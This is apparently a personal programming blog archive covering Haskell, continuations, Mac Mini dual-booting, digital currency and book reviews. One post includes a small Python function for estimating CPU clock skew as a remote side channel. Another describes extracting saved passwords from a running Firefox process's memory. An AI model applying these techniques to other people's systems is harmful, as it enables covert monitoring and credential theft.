    So Aaron writes to defend the Chinese Room Argument (go read that link if you don't already know the argument - you should).

    I am absolutely a child who grew up reading Egan (who writes awesome short story books - the full-length ones are not so great) so the idea of uploaded minds etc is as normal to me as trans-pacific shipping (I happen to be watching the ships in San Francisco bay at the moment).

    Take a neuron from my brain. It's certainly complex: it has many inputs, both dendrites and chemical, and its actions are poorly understood at the moment, but it's nothing magical. It's matter and fields and probably some quantum physics in there. If you think there is something magic about them - you can stop reading now but you have a lot of proof to provide.

    But if it's not magic, we could replace a neuron in my brain with a functional clone and I'm the same person. I'm not suggesting that we could do that tomorrow, but that we could do it at all. Repeat many times, and you have a conscious person with a non-natural brain.

    Unless you think that the result isn't conscious. Did that feature fade out as more neurons were replaced? If so, and since our artificial neurons are assumed to be perfect functional clones, it seems you do believe that there's something magical about natural neurons.

    On the other hand, if I have a conscious person with my crazy brain, why can't it run in simulation? My artificial neurons can be implemented using beer bottles and bits of string. It really doesn't matter.

    You say that informational processes have to be interpreted to mean anything. But consciousness is a process reflecting upon itself. That happens whatever the hardware is. Yes, it leads to some crazy-sounding conclusions and it's certainly not good for one's sense of self importance, but I'm led here by the above reasoning, which seems sound to me, and so I accept it.

    Maybe I'll write up one of those crazy conclusions later.

    Digital Gold Cash

    By way of chump I ran across eCache [Tor hidden service via public HTTPS proxy] which is another crypto based gold backed currency.

    I have a fondness for these things. I'm that way inclined, and I recently took advantage of my daily commute time to listen to Rothbard's What Has Government Done to Our Money? (everyone should take the time to read it). It seems that there's quite the industry behind eCache (by which I mean "not very much", but it's still more than I expected).

    eGold has existed for a long time and claims to have 35K 24-hour active accounts, which is tiny compared to VISA, but pretty shockingly high all things considered. Then there's unlinQ, which converts eGold/eCache to virtual credit cards (although "only available in fixed denominations, can't be reloaded or refunded" suggests that you lose a lot in the granularity since you generally can't pay for things with multiple cards).

    eCache claims to have 310 grams of gold, which is about $7500 worth of backing. Again, hardly going to set the world on fire, but it's more than some guy in a basement somewhere. I have no hope that it will go anywhere, but it's nice cyberpunk porn.

    Paper on PDF generation for Google Book Search

    I'll be presenting this paper at SPIE in San Jose next Wednesday.

    Google Books: Making the public domain universally accessible

    A pure Haskell JPEG decoder

    Here's something I knocked up: it's both a literate Haskell program and an HTML file describing the JPEG file format.

    Security through obscurity silly screws

    This week I ended up with one of these: .

    It's a Seagate SATA disk in an external SATA enclosure. I didn't have an external SATA port on anything useful, so I decided to take the hard drive out and put it in a USB enclosure. This shouldn't have been hard.

    Sadly, Seagate decided to use Torx Plus Security screws on the enclosure. They are like torx screws, but with only five points and a pin in the middle. Even that took a bit of finding out, and you can't get them in sets of "Security bits". You can get them on Amazon for $80. Yes, $80 for a set of 11 screw bits.

    So I drilled the buggers out and even going slowly didn't stop two of the screws welding themselves to the drill.

    Why on Earth do Seagate make that kind of crap? Don't ever buy one.

    Bit syntax for Haskell

    Documentation and source code.

    I must be getting old

    So, yesterday, I utterly forgot a password which I use several times a day. I'd typed it twice in the morning and, about mid afternoon, just stopped. This password was so instinctive I just couldn't believe that I couldn't type it, but no amount of frustration over the next 30 minutes changed that.

    But I remembered that I was logged in using it in a Firefox session which was running. So I managed to extract the password from the memory of the firefox process (more on that later) and, although I now had the password, it didn't make any sense. There was no “Oh! That's it!” moment, and no muscle memory when I tried to type it.

    So I was safe, but a little bit freaked out. A couple of hours later (after a beer, which should have been the obvious solution all along) I sat down at the computer and unlocked the screensaver without even thinking about it. (The screensaver needs the same password.) It took several minutes before I realised, and now ever having forgotten the password seems as impossible as ever having known it did a couple of hours ago.

    I guess it's only going to be a few short years until I start walking into rooms having forgotten why I went there in the first place.

    But anyway, I wrote up a very hacky program for extracting passwords from the memory of a running Firefox process - see the comments at the top for limitations.

    CPU clock skew side-channels

    This is great. He extracts timestamps from the TCP ISNs and uses that to measure skew of the CPU clock and thus the temperature. We can then tell how hard the CPU is working by measuring the temperature increase.

    People already know that time is a side channel and that you shouldn't leak information in the speed in which you process queries. Now you have to heat the CPU uniformly too. Giving out such good timestamps via the TCP ISN is probably a bad design and should be stopped. But there are many ways to get a timestamp from modern systems and noise just means that you need more samples.
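    As a rough illustration of the measurement step, the sketch below estimates clock skew from pairs of (local time, remote timestamp) by fitting a straight line to the drift. Ordinary least squares is my substitution for simplicity and the original work may well use a more robust fit; the function name and the sample format are assumptions for the example.

```python
def estimate_skew_ppm(samples):
    """Least-squares slope of (remote - local) against local time, in parts per million.

    samples: list of (local_time_seconds, remote_timestamp_seconds) pairs.
    """
    n = len(samples)
    if n < 2:
        raise ValueError("need at least two samples")
    xs = [local for local, _ in samples]
    ys = [remote - local for local, remote in samples]  # observed offset
    mean_x = sum(xs) / n
    mean_y = sum(ys) / n
    sxx = sum((x - mean_x) ** 2 for x in xs)
    if sxx == 0:
        raise ValueError("samples must span more than one local time")
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    return (sxy / sxx) * 1e6  # slope is drift per second; scale to ppm
```

    Noise in the individual timestamps only widens the error on the slope, so, as noted above, an attacker can compensate by collecting more samples.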

    Erlang concurrency in the Haskell type system

    Say that we wanted to implement message-passing concurrency in Haskell. Haskell is a nice language which is ruled by its type system like a Mafia don. (It's easy to design yourself into a corner from which there's nowhere to go if you're not careful.)

    From first glance, things look promising. GHC has lightweight threads and message channels already. But, unlike Erlang, the message channels are typed. So what's the type of a message? Well, we could implement a ping/pong example with:

    data Message = Ping | Pong

    That works fine, but it means that for every different type of message in the system we have to have an entry in that union type.

    So let's try using the class system to define an interface which an actor can implement:

    data Message b = Xon Int | Xoff Int | Reparent Int b
    
    class DataSource a where
      xon :: a -> Int -> IO ()
      xoff :: a -> Int -> IO ()
      reparent :: DataSink b => a -> Int -> b -> IO ()

    The message sending operations are all implemented as IO () functions. Note that we have also used the type system to enforce that any actor passed to reparent has to implement the DataSink interface. Sadly, Haskell can't cope with cycles in the module graph, although cycles in the reference graph are just fine. So if DataSource named DataSink they would both have to be in the same module.

    newtype MySinkThread = MySinkThread (Chan DataSink.Message)
    
    instance DataSink.DataSink MySinkThread where
      write (MySinkThread chan) fd dat = writeChan chan $ DataSink.Write fd dat
      closed (MySinkThread chan) fd = writeChan chan $ DataSink.Closed fd

    There's the instance of a DataSink class, which has two messages: write and closed. The methods just add a message to the channel object. If the actor had several interfaces to implement we would need to create a union type of the Message types of each of the interfaces. This means that having default values for the class methods isn't going to work because we don't know how to wrap the values which get pushed on the channel. I expect we can use templates to generate all the instance decls.

    We can use a monad very like ReaderT to thread the channel through the body of the actor:

    newtype ActorT t m a = T (t -> m a)
    
    runActor :: t -> ActorT t m a -> m a
    runActor thread (T func) = func thread
    
    instance Monad m => Monad (ActorT t m) where
      return a = T (\_ -> return a)
      T func >>= k = T (\r -> do a <- func r
                                 let T func2 = k a
                                 func2 r)
    
    instance MonadTrans (ActorT t) where
      lift c = T (\_ -> c)
    
    this :: ActorT t IO t
    this = T (\r -> return r)

    And then there's the question of how to write receive. Currently I don't have a better solution than to pass a series of values to a unary lambda with a case statement and to catch the exception if the match fails:

    receive $ \x -> case x of
                      DataSink.Write fd d -> ....

    The receive also needs a way to store the values which didn't match so that they can be tried with future receives. Probably the ActorT can carry a list of such values. Also, any pattern match failure in the receive body will cause the next message to be tried - I don't know any way round that.
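    The save-and-retry behaviour described above can be sketched outside Haskell too. The following Python toy is not the ActorT design, just an illustration of the idea: a handler signals "no match" by raising an exception, and rejected messages are kept, in order, for later receives. Mailbox, NoMatch and the two handlers are hypothetical names, and unlike a real actor this receive does not block waiting for new messages.

```python
from collections import deque


class NoMatch(Exception):
    """Raised by a handler to say that a message is not for it."""


class Mailbox:
    def __init__(self):
        self._incoming = deque()  # messages nobody has looked at yet
        self._saved = deque()     # messages rejected by earlier receives

    def send(self, message):
        self._incoming.append(message)

    def receive(self, handler):
        """Try saved messages first, then new ones; keep whatever fails to match."""
        pending = list(self._saved) + list(self._incoming)
        self._incoming.clear()
        for index, message in enumerate(pending):
            try:
                result = handler(message)
            except NoMatch:
                continue
            # Matched: every other message stays queued, in arrival order.
            self._saved = deque(pending[:index] + pending[index + 1:])
            return result
        self._saved = deque(pending)
        raise LookupError("no pending message matched")


def on_write(message):
    if message[0] != "write":
        raise NoMatch
    return message[2]  # the data payload


def on_closed(message):
    if message[0] != "closed":
        raise NoMatch
    return message[1]  # the file descriptor
```

    The sketch shares the weakness mentioned above: if a handler raises NoMatch from deep inside its body for some unrelated reason, that is indistinguishable from a failed pattern match and the next message is tried.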

    In short: could work fairly well with some work

    libc functions of the week

    open_memstream and fmemopen (both link to the same manpage). These functions are for passing to libraries which expect a FILE * and you want to keep a buffer in memory. Certainly beats writing a temp file.

    Google Books PDF download launched

    Did you wonder what that JBIG2 compressor was for? Now you know

    WEP is now really, really dead

    “The final nail in WEP's coffin”

    Dual booting OS X and Linux on an Intel Mac Mini

    Headline: all the hardware works and seems to work well.

    Warning: the first time I tried this Bootcamp chomped the OS X filesystem and made the system unbootable. Pay attention to the Bootcamp warnings and back up any data you care about first.

    Prepping OS X

    I'm working from a completely clean OS X install here so you may have already done some of these steps:

    Select software update from the Apple menu and get 10.4.7 and all the firmware options offered (I only had one). After the reboot go to http://www.apple.com/support/downloads and search for “mini”. You want two firmware updates and the first (SMC) should have happened via Software Update. The other should now be listed. I don't know how stable the URLs are, but currently it's at:

    http://www.apple.com/support/downloads/macminiearly2006firmwareupdate101.html

    Follow all the instructions about installing the firmware and don't interrupt the process, lest you want to turn your mini into a brick.

    Boot into OS X (you can hold the Option key at startup to select the boot volume - but it should be the default) and install rEFIt from refit.sf.net. Reboot and check that everything works. rEFIt is an EFI bootloader which will be booting lilo for us.

    Get bootcamp from http://www.apple.com/bootcamp and install. It ends up in Applications/Utilities.

    Run it, don't make a driver CD and partition the disk however you want. Click “Restart Mac OS X” and check that the system can still boot.

    Insert a Gentoo 2006.0 minimal install CD and shutdown the system. Press the power button and hold 'c' to boot from the CD.

    With the 2006.0 install kernel the Sky2 NIC will work, but the wireless doesn't (yet) so you'll need a cabled Internet connection.

    You must use parted to partition the disk. The partition table is in GPT format and fdisk doesn't know about it. (Also, remember that when configuring the kernel).

    After the partitioning and mkfs you can check that the system still boots. But when you run the install CD again, the kernel won't know about any of your partitions (because it's a GPT, which I'm guessing the install kernel doesn't know about). Run parted and delete and recreate the partitions with the exact same numbers again and the kernel will suddenly know about them. You don't need to mkfs again (unless you changed the numbers). (When you do this in future you need to set the boot flag, rerun lilo and rerun the rEFIt partition tool because parted seems to clear all that.).

    Now, it's a standard Gentoo install. See http://www.gentoo.org/doc/en/gentoo-x86-quickinstall.xml

    You can find the kernel config I used at http://www.imperialviolet.org/binary/macmini/kernel-config. It's probably not perfect for most people, but it will get you booting. The important points are:

      Device Drivers -> SCSI -> low-level drivers -> SATA support -> Intel PIIX/ICH
      Device Drivers -> Network Device -> Ethernet (1000 Mbps) -> SysKonnect Yukon2
      ... -> ... -> Wireless LAN -> Wireless LAN drivers

    I'm using lilo. The /etc/lilo.conf config should look something like:

    lba32
    
    boot = /dev/sda
    map = /boot/.map
    
    prompt
    delay = 50
    vga = normal
    
    image = /boot/bzImage-2.6.17.3
    	root = /dev/sda3
    	read-only
    	label = 2.6.17.3

    Run lilo, then run parted and enter:

    • print
    • set
    • (the number of your partition, probably 3)
    • boot
    • on
    • quit

    Reboot

    At the rEFIt startup screen, select the partition tool and sync the MBR.

    With a bit of luck, rEFIt will give you the option to boot from the Linux on the HD. You should now be booting into Linux.

    Getting X working

    Using the new, modular X, you want to set VIDEO_CARDS=i810 in your /etc/make.conf and you need Xorg 7.1 to drive the 945GM found in the mini mac. To get that you may need ACCEPT_KEYWORDS=~x86

    I needed some tricks to get the correct resolution because my panel size (1680x1050) isn't in the native list of video modes. If you need this, see the instructions at http://klepas.org/2006/04/09/ubuntu-on-the-inspiron-6400/

    You can see my xorg.conf at http://www.imperialviolet.org/binary/macmini/xorg - note the odd ForceBIOS option for getting the resolution correct. The 915resolution arguments I'm using are: 915resolution 5a 1680 1050 32 (yes, set 32-bit depth here and 24-bit depth in the xorg.conf).

    Getting sound working

    The 2.6.17.3 kernel needs a patch to get the sound unmuted. Get it from here: http://hg-mirror.alsa-project.org/...

    Wireless

    The madwifi.org drivers for the Atheros work perfectly. Follow the newbie HOWTO on that site.

    If it all goes wrong

    Then just reinstall OS X and try again.

    Insert the OS X install CD and power on. Hold down 'c' to boot from the CD.

    The installer seems to make little or no effort to partition a disk so, if there are no volumes given as a target to install to, don't panic. Select Terminal from the menu and use diskutil to repartition the disk. The command will be something like diskutil partitionDisk disk0 1 "Journaled HFS+" OSX 1M.

    JBIG2 encoder released...

    JBIG2 encoder released

    I've gotten to go ahead t...

    I've gotten the go-ahead to open source a JBIG2 encoder I wrote for work; look for that tomorrow or so.

    Summer of Code is active. Go look at that project list (even if you aren't going to do anything under SoC it's a central TODO list for open source software: something we've not had before).

    And this is a really cool paper about high speed concurrency in Haskell - with source.

    BBC podcasts

    Fantastic: after too much effort being put into Real-based stuff, Radio 4 finally has downloadable MP3s of some shows. That's been going on for a while but the selection was very limited. Top of the new list is Newspod - a pick of the day of the BBC news. Not to mention that the ever wonderful Now Show is also available.

    Patent crazyness

    I have a (fairly) well tested, fast online codes implementation which I would post here except that it's clearly not worth the pain when there's a crazy company which believes that it has a patent (baseless or otherwise).

    At least that company does, in fact, make something I guess.

    Control flow with continuations

    I've been hacking about with an interpreter for a little language I'm playing with. The end goals (as ever) are suitably vast, but for the moment I'm writing the dumbest interpreter possible. Here's a little snippet which actually runs:

    var if = { #test x y# (ifte test x y) }
    
    var cc = { return return }
    
    var while = { #test body#
      var k = cc
      if (test) {
        body return
        k k
      }
    }
    
    while { continue 1 } { #break# print }

    Here are the rules:

    • { starts a lambda, the arguments are named in between the # symbols
    • The continuation for the current function is called continue for anonymous lambdas and return for named lambdas
    • Symbols a b c are interpreted as calling a with b and c as arguments.
    • ifte returns its second argument if its first argument is true, otherwise it returns its third argument

    And the explanation:

    if is a simple wrapper around ifte which passes its arguments to it and calls the result. So you pass a value and two callables and one of the callables is run.

    cc returns its own return continuation. In Scheme it would look like this:

    (define (cc) (call/cc (lambda (k) (k k))))

    Let's build the while loop up from parts. First, consider a function which is an infinite loop:

    var loop = {
      var k = cc
      k k
    }

    k is the continuation of cc, so if we call it upon itself, cc returns again and returns the same value: k

    Now we add a test callable. Each time round the loop we call the test to see if we should continue:

    var loop-while = { #test#
      var k = cc
      if (test) {
        k k
      }
    }

    Then it's just a case of adding a body argument and calling it every time. The body gets a single argument - the return continuation of the while function. If the body calls this it acts the same as a break in a C-like language.

    My frequency of posting h...

    My frequency of posting has dropped to the point where one would be forgiven for wondering if I was still alive. Well, rest assured that I'm not typing this from beyond the grave, it's just that Google is keeping me busy.

    None the less, I was motivated to post this:

    “consumers concerned about the scam should avoid PIN-based retail transactions, and chose instead to make signature-based, credit-card-style transactions when making purchases with debit or check cards at stores.”

    (from http://www.msnbc.msn.com/id/11731365/)

    Because, chip and pin is so much safer, right? No one could have predicted that putting people's pin numbers everywhere would make it easy to steal them.

    Charging for email

    Firstly, anything which upsets so many people clearly has to be worth looking at, right? Well, it would actually appear not - they're all pretty boring.

    (p.s. from some of the descriptions of the specific cartoons on the news I'm not sure if they are actually on that page. Has anyone actually seen these cartoons?)

    Micropayments, fungible (cash) or otherwise (hashcash), have been suggested as the solution to spam for a long time. Clearly it's a very tough deployment problem (you need lots of people to suddenly start using it), but it would appear that Goodmail have persuaded AOL and Yahoo to sign up (and thus might have solved the deployment problem).

    The hope is that, by increasing the cost of sending email, one can make spam uneconomic. But it really doesn't appear that Goodmail is even trying to do that; unpaid email is treated the same as it always was. If the price is too high for spammers (and the quoted 1/4 cent probably is) then they won't pay and spam will be exactly the same as ever.

    As an email sender, the only reason I would wish to pay this is because I have good reason for sending the email (ecommerce confirmations etc) and I don't want the hassle of dealing with customers whose spam filters eat my emails. That's pretty weak. These people have had to deal with it for a long time, and customers can nearly always dig through their filters to find an email that they're expecting.

    And since Goodmail are getting paid for each email, their motivation for not accepting emails from spammy senders isn't perfectly aligned with the interests of their customers. Clearly they don't want to squander any trust - but there's a strong temptation to see how far you can push customers for that extra bit of income.

    And is spam really a problem for anyone these days? I get about 200/day and > 95% fall into the spam trap with very few false positives (that's with Gmail). The spams which do get through are random assortments of words usually.

    So I predict that Goodmail will get few customers and make very little difference to anyone.

    (and clueless quote from that article: "I still gets e-mails from lists I signed up for three years ago, but I haven't responded to a single one." - then unsubscribe you moron!)

    Google in China

    So Google have launched in China and are censoring results. This has made a lot of people very unhappy (we had protestors outside today voicing that unhappiness).

    Just to be clear, Google doesn't have an option of running an uncensored version in China - it's censored or nothing. It's only a company and, as such, has to follow the laws of the countries it operates in. But Google could have taken a stand and refused to join in. I guess that's what all those people wanted us to do. But here's the thing...

    I really don't think it matters

    Years ago there was a great hope that the introduction of the Internet into China would open the eyes of all the people. Once they knew about the oppression under which they toiled, how could they stand it? Well, they did. Turns out that people will put up with it. The Great Firewall of China isn't perfect; its main function is just to remind people that Big Brother is watching. These people know the oppression under which they toil and accept it. We believed too much in the power of the Internet and we were wrong.

    The driving force for change in China is capitalism, not free expression. All the recent improvements in the lot of the newly rich Chinese can be traced to good old fashioned material want. And change in the future is going to come when the bulk of the, still very poor, people start to wake up to this fact. It's happening already and it's only going to get better.

    It might have been nice to make a stand for freedom in this case - but pointless. I really hope Google would never turn someone in like Yahoo did, that's just plain bad, but so far it's not worth the fuss.

    Open Rights Group Alive

    The UK's answer to the EFF is now up and running and accepting donations. I was at the 'birth' of it in Hammersmith last year when the pledge was setup to fund it.

    Well, they've reached 1000 members and it's time to pay up if you are one of them. I don't really want to use PayPal so they'll have to wait until I'm back in the country and I'll mail them a cheque (but I'll be back in a few weeks time; I think they can manage till then).

    Things one should read:Fa...

    Things one should read:

    • Factor - a programming language; very Forth like. I'm playing with it when I get a chance. I'm still not sure about stack based languages. They have nice advantages: factoring out functions is stupidly easy and when the data flow works, it's very elegant. But one cannot understand only part of a function (which is why each function must be small) and, when dealing with > 3 variables, the stack fuzz is crazy. None the less, factor has a good environment (based on jEdit, by the same author) and Erlang like concurrency.
    • Curve25519: a paper on a (fairly) novel public key system with highly optimised implementations, data-independent timing and 32-byte public keys? It must be DJB. (and for anyone who hasn't seen it: his break of AES)

    Things one should listen to:

    (both are BBC and so both need RealPlayer. Sorry. You can get them working with mplayer if you try.)

    Turns out that char isn't...

    Turns out that char isn't short for signed char, it's a distinct type:

    % cat tmp.c
    void foo(void)
    {
        signed char   *ps = "signed?";
        unsigned char *pu = "unsigned?";
    }
    % gcc -c tmp.c
    tmp.c: In function 'foo':
    tmp.c:3: warning: pointer targets in initialization differ in signedness
    tmp.c:4: warning: pointer targets in initialization differ in signedness

    From this thread

    So it's been a while sinc...

    So it's been a while since I've written anything here. In fact I probably haven't had a gap this long since the last time I worked at Google.

    A number of people have emailed to ask how I'm doing and I've had to batch up all the replies for the last week. Serving dinner at work is great from a healthy eating point of view, but I really don't feel like doing anything much when I get home at 8, 9, 10 o'clock after dining there. You all deserve personal replies, but it's Sunday evening, just before bed, as I write this and I have to admit that it's not going to happen.

    Over the weekend I moved into the fourth place I've had since I've been here. I'm averaging three weeks in any one place so far but this place is going to last for a year - really it is. It's a really nice house in Palo Alto with four other people. Thanks to IKEA I now have some furniture but not, yet, any Internet connection here.

    And the climate is crazy. It's mid December and I can quite happily walk home at one in the morning in only a t-shirt. Of course the natives are complaining about the bitter cold and wrapping up in three or four layers, but such is the world.

    It's also the time of Company Christmas parties. Google's was last weekend and was suitably huge, taking up two San Francisco pier buildings. Turns out that the cheapest way to get to Palo Alto from SF at 3am is to hire a stretch limo. Odd but true, and a cool way to round off the evening.

    I'll not be home for Christmas, I've only been here a few months and my family shan't be there anyway. I suspect Christmas will probably be pretty quiet so, you never know, I might get round to writing another blog post by then.

    Lots of public domain books

    Read the Google weblog post if you want, but the operative information is that you go to Google Print and use the date operator to restrict searches to public domain books.

    If you are in the US you can use date:1500-1923 and, if you are outside the US, you can use date:1500-1846 (or proxy through a US host).

    Update: fixed link - thanks Aaron.

    Impressions of a Powerbook:

    • Exposé is very good - but I still like tiled window managers.
    • Quicktime destroys audio. I assume it's Quicktime, it happens for both iTunes and the DVD player. There's an FFT in there somewhere and it's spewing crap into the signal. No amount of turning off eq's and the like fixes it. (but if you know how, please do tell).
    • kqueue doesn't support events from the terminal. This is so silly that I almost can't believe that it's true, but it appears to be.
    • Where the hell is the page up button? That's really annoying. Update: Found it (Fn + arrow keys) - thanks Andy

    Blinking at the price

    Blink is really a collection of short stories (I've just finished it). They are well weaved together and they are all related - but I'm not sure that they really deserve to be in the same book.

    Usually a work like this would be presented as a more old fashioned argument but Blink gets by without any real structure at all. And it's a good read which sells well so I can hardly say that that's a bad idea. Yet, by the end, I was left wondering what exactly I should be taking away from this. I made a list of all the stories, grouped them together and came up with titles for each of the groups:

    • Given a lot of training your subconscious is a great parallel processing system. (Kuros; Red card, blue card; Double fault)
    • The scientific method works. (Gottman; Doctors who get sued; Cook County)
    • Your subconscious can screw you up (IAT; Priming; Warren Harding)
    • Conscious interference will screw up subconscious decisions (Speed dating; Verbal overshadowing; Different jams)
    • Bad surveys give you bad results (New Cola; Aeron chair)
    • People react badly under stress (Police in the Bronx)

    So it seems to me that the book is arguing six different things. Or, at least, it would be if it were arguing anything at all.

    Most of them are actually pretty interesting results, even if the point is pretty bland (e.g. the second group). I've heard about the system about divorces before, but the doctors getting sued was new to me.

    If I were forced to draw it all together I would have to say that it's a pretty damning attack on the notion of The Rational Being. That poor being has been under attack from lots of directions (esp neuroimaging) for years now and it does feel like the ideal of the rational, scientific mind is going the way of Newton's clockwork universe in the face of physiological quantum theory.

    (Just to recap, that means that my rational mind is flagging the fact that I don't seem to have a rational basis in believing that I'm rational. The irony is eye-watering)

    It's a fun read, but I couldn't help looking at the price on the inside cover and thinking that it's not that good a read.

    Malcolm Gladwell came to speak...

    ... at Google today (and we got free copies of “Blink” - don't you love Google.) It looks like his next book will probably have one of the themes that he talked on today.

    The first was conceptual innovation vs experimental innovation. Conceptual innovation is the eureka moment - a new idea which is just very good. Picasso is his example. Picasso made most of his ground breaking stuff when he was young, he planned it, it was a new idea and he faded out as he got older.

    Experimental innovation is the kind which takes a very long time to develop. First example: Cézanne. As opposed to Picasso he was unremarkable for decades. If you study his paintings from when he was 40 (Gladwell says) you would not predict that he would be world class in his 60s.

    Second example: Fleetwood Mac. Their first hit album was Rumours and it was their 16th album. Their long suffering record company supported them through 15 duff albums before getting some money back. (Can you imagine that happening today?)

    And that last comment seems to be Gladwell's hook for the book - we're missing too much experimental innovation because, as a society, we're geared towards conceptual breakthroughs

    Next topic; targeting elite kids. Gladwell, he claims, was one of the top three junior runners in Canada at age 14. You wouldn't know it to look at him and, although the Canadian government sent him to special running training etc, he didn't turn out to be a great runner at age 21 etc.

    Gladwell says that selecting at a young age is a terrible thing to do because performance in a given area (physical or mental) is a terrible predictor of success in that field when they get older. He seems to have a lot of studies to back this up. Education, he believes, should be more egalitarian.

    One interesting study he quoted was the relation between going to Harvard and earning more later in life. Harvard claims that going there is great for future income (and it would have to be because Harvard costs a lot) but it turns out that the biggest predictor for earning lots is applying to Harvard. You don't have to get in, you just have to be the sort of person who believes that they can and are willing to try it.

    Well there you go. I await the next book, Malcolm.

    Update: There's a recent text, by Gladwell, from the New Yorker about Harvard's entry system.

    I don't usually comment o...

    I don't usually comment on anything Google related here since I started, but I'll make an exception this time:

    Once upon a time there was a website, a kind of proto wiki, and, at the bottom of each page, was a link titled "Delete this page". The Google crawler did its crawl and that was the end of that website.

    (The reason it came to light is because the webmaster of that site emailed Google "asking for his website back" (or words to that effect) and I believe that we dug them out of the crawl data for him. But this is beside the point.)

    The point is that no one does that sort of thing any more. GET links on a website must not mutate anything, or you can be sure that one of a number of crawlers will trigger them.
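
    As a minimal sketch of that rule (this is not the code of any real site; the `handle` function and the `pages` dictionary are made up for illustration), a handler can refuse to change state on GET and only delete on POST:

```python
def handle(method, path, pages):
    """Return (status, body) for a request against an in-memory wiki."""
    name = path.rsplit("/", 1)[-1]
    if path.startswith("/delete/"):
        if method != "POST":
            # Crawlers follow links with GET, so GET must never delete.
            return 405, "use POST to delete"
        pages.pop(name, None)
        return 200, "deleted"
    if method == "GET":
        return (200, pages[name]) if name in pages else (404, "not found")
    return 405, "method not allowed"


pages = {"Home": "welcome"}
crawl = handle("GET", "/delete/Home", pages)    # a crawler following the link
survived = "Home" in pages                      # the page is still there
human = handle("POST", "/delete/Home", pages)   # a deliberate form submission
```

    A login page in front of this changes who can send the request, not what a GET is allowed to do.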

    But people didn't really learn, they just retreated behind login pages and such and made all the same mistakes. Now 37signals, no less, a group which carried my respect (until today) is getting very upset that crawlers are getting behind the login pages all over again.

    I won't even comment that they seem to think that GWA has been pulled because of their blog post, nor about the commentators who are making a big deal of the MUST NOT vs SHOULD NOT wording in the spec. Here's the end result

    It's a bad idea - anywhere.

    (I'm not on the GWA team. This is not from them and involves no non-public knowledge of that project)

    Made it

    Am now living in Mountain View, CA. In a hotel at the moment, but with a week before I start work and Craigslist to hand, hopefully somewhere more permanent soon. I understand that most people start by living in Mt View and then, over time, move into San Francisco city proper as they realise how dull the nightlife is here.

    By booking a seat as far forward as I could and with a brisk walk off the plane, I managed to be one of the first people into border control and cut my Time to Clear Border Control to 10 minutes (from some two hours last time). Most of that time was taken up with the official complaining that I hadn't filled out one side of the I94 form. Perhaps I should have stood up for foreigners everywhere and pointed out that the words "For Government Use Only" were written in large, red letters across the top. In reality I said sorry in fear of being sent to the back of a queue of several hundred people which I had put so much effort into being at the front of. So I'm a coward, but a less tired and pissed off coward.

    The flip side of being fast through border control is that they can't clear the luggage off the plane that quickly. So, in future, it may be possible to look less like you're trying to get ahead of everyone while maintaining the same TTCA (Total Time to Clear Airport).

    Still the hotel is good and I've just got myself a bike to get around on. I need to change rooms, however, because I'm out of range of the wireless network for the hotel. Sitting in the lobby with a laptop is a pain. Oh, and ALSA is very upset about my laptop and that's foiled my plan to use SkypeOut. It's listing no soundcards and yet it's playing quite happily. Sadly recording is right out.

    I also see that Aaron Swartz has decided to keep with his startup company and not return to Stanford. And I was going to look him up now that I'm here too! Dropping out of college to start a company ... how's it feel to be a stereotype, Aaron?

    The Singularity Is Near

    book cover

    This is a big book, and not just because the font is really huge; yet I can't help but feel that it would have been much better had it been a lot smaller.

    It's broken into three main parts. The first consists of a lot of graphs to really hammer home the message that exponential growth is happening all around us. And it's all very convincing in the areas which he chooses. Certainly everyone has come to live with and expect transistor counts to double every 18 months or so, but I will admit that I didn't know that productivity per hour of a US worker is also rising exponentially. What's neat is exactly how many of these graphs are really good straight lines.

    That goes on for quite a while and then the main part of the book is a huge long list of all the cool things that are happening right now across a wide range of subjects. All these developments are introduced to support the idea of the singularity happening and, to give credit where it's due, Kurzweil does make solid predictions about when things will start to happen. The amount of research that has gone into this book is impressive and it reads like a 10,000-foot overview of most of the interesting work in science and engineering today. That's also the problem with it. There's page after page of the stuff and none of it ever goes into enough detail to really be interesting. As soon as you want to know more you're whisked away to the next wonderful development.

    There is a large section of notes referencing everything, and this is good. But it's very hard to say that the book as a whole is very interesting reading. There is a third section, his responses to critics, but I don't feel that I actually want to bother reading it having slogged through the first two sections.

    In the end, even if I'm convinced that it's all going to happen, just as he says, how is it useful information? Knowing that the washing machine is broken is useful information because it allows me to make better choices (e.g. to not bother trying to do any washing today). But knowing that the future is going to be wonderful is nice - but I can't see how it helps me yet. If I'm going to live for hundreds of years then maybe I should save more? But, if Kurzweil is right, then we will all be fantastically (materially) wealthy anyway, so it doesn't really matter.

    However you spin it, there's a lot of hard work between here and there, so get back to work and you might have a technological utopia in a few decades if you're lucky ;)

    "Walking the line that's painted by pride..."

    (I'm not sure if you get positive or negative points for knowing why I chose that title )

    So this weekend saw the first (maybe of many) Startup Schools, run by Y Combinator, which is Paul Graham's hacker starter helping company. I'm sure there is lots of stuff being written about it, but I can't give you any links right now because I'm sitting in Boston Airport and the WiFi costs about $8.

    Y Combinator have a couple of offices, one is walking distance from where I'm living in Mt View, the other is in Boston - the other side of the country. Guess where it was held? Never mind, it gave me a chance to visit the east coast of the US, which I've never managed to do so far. The heavy rain certainly makes a difference from the monotonous meteorological monotone which is Bay Area weather. It's damp and cold here; it could almost be home. Photos on Flickr when I upload them.

    The event consisted of a party on Friday night, all day talks Saturday and, I think, something today, but I've to catch a flight. The speakers list was very impressive and uniformly the talks were excellent and very well received. Of course, Google was there with a recruitment talk which (in the opinion of several people more independent than I) kicked the arse of the Yahoo talk.

    It was very good meeting up with people; new people, people for the first time physically, people unexpectedly and famous people. The latter category includes Stephen Wolfram (who is easier to talk to than to read), Paul Graham and Michael Mandel, the economics editor of Business Week.

    I don't know how many good startups will come of it. I'm certainly not going to be one of them (yet), comfortable as I am in the generous embrace of Google. But Y Combinator is doing an excellent job.

    Still, I've a bike upside down on my kitchen floor with a puncture and a wheel nut which is too tight to get off with a spanner, a driving test to sort out, a better apartment to find and work tomorrow. Back to reality and, hopefully, back to posting a little more often than I have been.

    Startup School

    I'll be at Paul Graham's Startup School this October 15th in case anyone who reads this will be there too. It's not that I'm looking to get out of Google before I've even started, but all good things...

    Looks like I left it a little late to book the hotel though. All the nearby ones are sold out on the Saturday and I've ended up in a Holiday Inn some way away. Never mind, there are always taxis.

    Crappy laptops

    And I really need to replace this old laptop as my main system. I'm sure that it was good in its day, but it was a hand-me-down from someone else many years ago and it just can't keep up with Firefox. Thankfully, Opera have now released their browser for gratis, and without advertising. I guess that they've decided that they aren't going to win the desktop wars now and they should concentrate on their mobile offerings.

